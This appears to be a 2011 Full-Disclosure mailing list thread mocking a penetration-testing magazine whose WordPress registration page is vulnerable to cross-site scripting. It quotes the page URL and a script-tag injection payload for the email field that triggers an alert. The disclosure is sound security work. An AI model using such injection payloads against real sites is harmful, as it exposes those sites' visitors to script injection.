haha well, good stuff...another flawed seller/spreader of shit is uncovered, good work tomy ..
That bug is not one wich is , say, 0day, it is one wich auto updates would have handled... i guess the guy dont know how to configure auto uopdating, or , maybe likes his plugins for WP tomuch... wp has a bug, but it aint there...lol... that bug, i believe, is due to not updating... if im right... Sad, that these are actually people who are making a magazine, about a scene.. shows how bad the scene really has gotten.. good bughunt dude.. good stuff, you made a very valid point. anyone who is selling or, trying to spread theyre word of ezines etc, should ceertainly be ontop of webskils.. i know i am not, but i would never try to publish a pemtesting mag either.. lol, crazy stuff! 2011/12/8 Tomy <supp...@vs-db.info>: > > it does not matter, it's about the fact that someone who publishes such a > newspaper should know his stuff.. > > Tomy > > > > Wiadomość napisana przez Gage Bystrom w dniu 8 gru 2011, o godz. 00:04: > > Nice, but is it stored? Or at least reflective? > > On Dec 7, 2011 2:59 PM, "Tomy" <supp...@vs-db.info> wrote: >> >> >> still vulnerable: >> >> sample: >> http://pentestmag.com:80/wp-login.php?action=register (XSS) >> >> e-mail: >> john....@somewhere.com</sCrIpT><sCrIpT>alert(87118)</sCrIpT> >> >> >> LOL >> >> >> >> Wiadomość napisana przez xD 0x41 w dniu 7 gru 2011, o godz. 23:30: >> >> >> >> Tomy >> supp...@vs-db.info >> >> >> >> >> _______________________________________________ >> Full-Disclosure - We believe in it. >> Charter: http://lists.grok.org.uk/full-disclosure-charter.html >> Hosted and sponsored by Secunia - http://secunia.com/ > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > > > Tomy > supp...@vs-db.info > > > > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/